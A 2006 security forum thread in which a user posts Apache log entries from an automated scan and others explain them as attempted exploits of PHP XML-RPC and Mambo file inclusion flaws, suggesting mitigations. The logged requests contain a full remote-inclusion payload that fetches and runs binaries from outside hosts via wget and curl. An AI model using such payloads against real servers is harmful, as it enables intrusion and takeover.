strange things in apache2 log file

Open forum for security issues and info.
Forum rules
Any posts concerning pirated software or offering to buy/sell/trade commercial software are subject to removal.
User avatar
Bluefan
Posts: 586
Joined: Mon Oct 17, 2005 5:20 am
Location: Rekken, the Netherlands
Contact:

strange things in apache2 log file

Unread postby Bluefan » Tue Apr 04, 2006 7:29 am

I just got across my apache log file, as I just setted up a very small server just to test the connection. The only one knowing was me, and someone else I asked to test.
But, I got this strange stuff in the logs:

Code: Select all

85.124.118.43 - - [04/Apr/2006:04:55:18 -0700] "POST /blog/xmlrpc.php HTTP/1.1" 404 213 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
85.124.118.43 - - [04/Apr/2006:04:55:18 -0700] "POST /xmlrpc.php HTTP/1.1" 404 208 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
85.124.118.43 - - [04/Apr/2006:04:55:19 -0700] "POST /blog/xmlsrv/xmlrpc.php HTTP/1.1" 404 220 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
85.124.118.43 - - [04/Apr/2006:04:55:20 -0700] "POST /blogs/xmlsrv/xmlrpc.php HTTP/1.1" 404 221 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
85.124.118.43 - - [04/Apr/2006:04:55:24 -0700] "POST /drupal/xmlrpc.php HTTP/1.1" 404 215 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
85.124.118.43 - - [04/Apr/2006:04:55:26 -0700] "POST /phpgroupware/xmlrpc.php HTTP/1.1" 404 221 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
85.124.118.43 - - [04/Apr/2006:04:55:27 -0700] "POST /wordpress/xmlrpc.php HTTP/1.1" 404 218 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
85.124.118.43 - - [04/Apr/2006:04:55:28 -0700] "POST /xmlrpc.php HTTP/1.1" 404 208 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
85.124.118.43 - - [04/Apr/2006:04:55:29 -0700] "POST /xmlrpc/xmlrpc.php HTTP/1.1" 404 215 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
85.124.118.43 - - [04/Apr/2006:04:55:30 -0700] "POST /xmlsrv/xmlrpc.php HTTP/1.1" 404 215 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
85.124.118.43 - - [04/Apr/2006:04:55:31 -0700] "GET /index2.php?option=com_content&do_pdf=1&id=1index2.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://210.3.4.193/cmd.txt?&cmd=cd%20/tmp;wget%2070.168.74.193/strange;chmod%20744%20strange;./strange;cd%20/var/tmp;curl%20-o%20arts%20http://207.90.211.54/arts;chmod%20744%20arts;./arts;echo%20YYY;echo|  HTTP/1.1" 404 208 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
85.124.118.43 - - [04/Apr/2006:04:55:32 -0700] "GET /index.php?option=com_content&do_pdf=1&id=1index2.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://210.3.4.193/cmd.txt?&cmd=cd%20/tmp;wget%2070.168.74.193/strange;chmod%20744%20strange;./strange;cd%20/var/tmp;curl%20-o%20arts%20http://207.90.211.54/arts;chmod%20744%20arts;./arts;echo%20YYY;echo|  HTTP/1.1" 404 207 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
85.124.118.43 - - [04/Apr/2006:04:55:33 -0700] "GET /mambo/index2.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://210.3.4.193/cmd.txt?&cmd=cd%20/tmp;wget%2070.168.74.193/strange;chmod%20744%20strange;./strange;cd%20/var/tmp;curl%20-o%20arts%20http://207.90.211.54/arts;chmod%20744%20arts;./arts;echo%20YYY;echo|  HTTP/1.1" 404 214 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"


Seeing the 404 code, I know nothing happened, but what the heck is going on? I ran my server on my octane just for a few hours, so what can this be?
I used the default log directive of neko apache2
:O2:Toika :O2:Myra :O2:Fiona :Octane:Lisa :Octane:Sandra :Indigo2:Danica :Indy:Giana :O200:Lara :O200: :O200:Iona :O2000:Aida

Brombear
Posts: 786
Joined: Sun Oct 05, 2003 8:42 am
Location: Frankfurt (Rhein-Main Area) / Germany
Contact:

Unread postby Brombear » Tue Apr 04, 2006 8:24 am

Some script kiddies trying to target your server to upload some bad scripts via known vulnerable (in your case not installed) things. Nothing bad happened.

Matthias
Life is what happens while we are making other plans

User avatar
joerg
Donor
Donor
Posts: 2229
Joined: Thu Jan 08, 2004 6:57 am
Location: In an origin rack - Germany
Contact:

Unread postby joerg » Wed Apr 05, 2006 11:58 pm

Once again a pear xmlrpc script is vulnerable. An unvalidate varibalbe goes into a eval() function call which than can execute php code. This code was used in some other projects to like blogs,cms and so on.

Nothing special and not realy new.

regards
Joerg

User avatar
johnsmith
Posts: 128
Joined: Tue Mar 22, 2005 1:11 am
Location: Cairo
Contact:

Unread postby johnsmith » Thu Apr 06, 2006 12:08 am

What they're trying to do is execute programs on your computer off a remote server, which is saved in /tmp. Even if you do have the vulnerable php apps, you can mitigate against this by having allow_url_fopen off in php.ini (so they can't get the remote program), and by mounting /tmp as noexec.


Return to “SGI: Security”

Who is online

Users browsing this forum: No registered users and 1 guest